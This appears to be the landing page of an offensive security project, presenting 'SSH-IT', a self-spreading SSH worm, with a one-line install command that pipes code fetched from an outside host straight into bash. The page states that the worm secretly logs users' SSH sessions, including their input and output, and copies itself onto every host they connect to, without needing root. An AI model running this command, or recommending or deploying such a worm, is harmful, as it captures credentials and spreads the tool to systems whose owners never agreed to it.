Skip to the content.
An autonomous SSH worm

Install / Deploy

SSH-IT can be installed and deployed with a single command:

bash -c "$(curl -fsSL ssh-it.thc.org/x)"

Read more and learn some tricks.

What it does

SSH-IT intercepts outgoing SSH connections every time a user uses ssh. It logs the session and (secretly) installs itself onto the newly connected system. SSH-IT keeps intercepting, logging and spreading.

How it works

SSH-IT executes the original ssh command inside a fake PTY harness and intercepts any user input and output. None of the system binaries are modified and it does not need ptrace(). It does not require root or superuser privileges.

Read our detailed explanation for more information.

Contact

Twitter: https://twitter.com/hackerschoice
Telegram: https://t.me/thcorg
Web: https://www.thc.org
Medium: https://medium.com/@hackerschoice
E-Mail: members@thc.org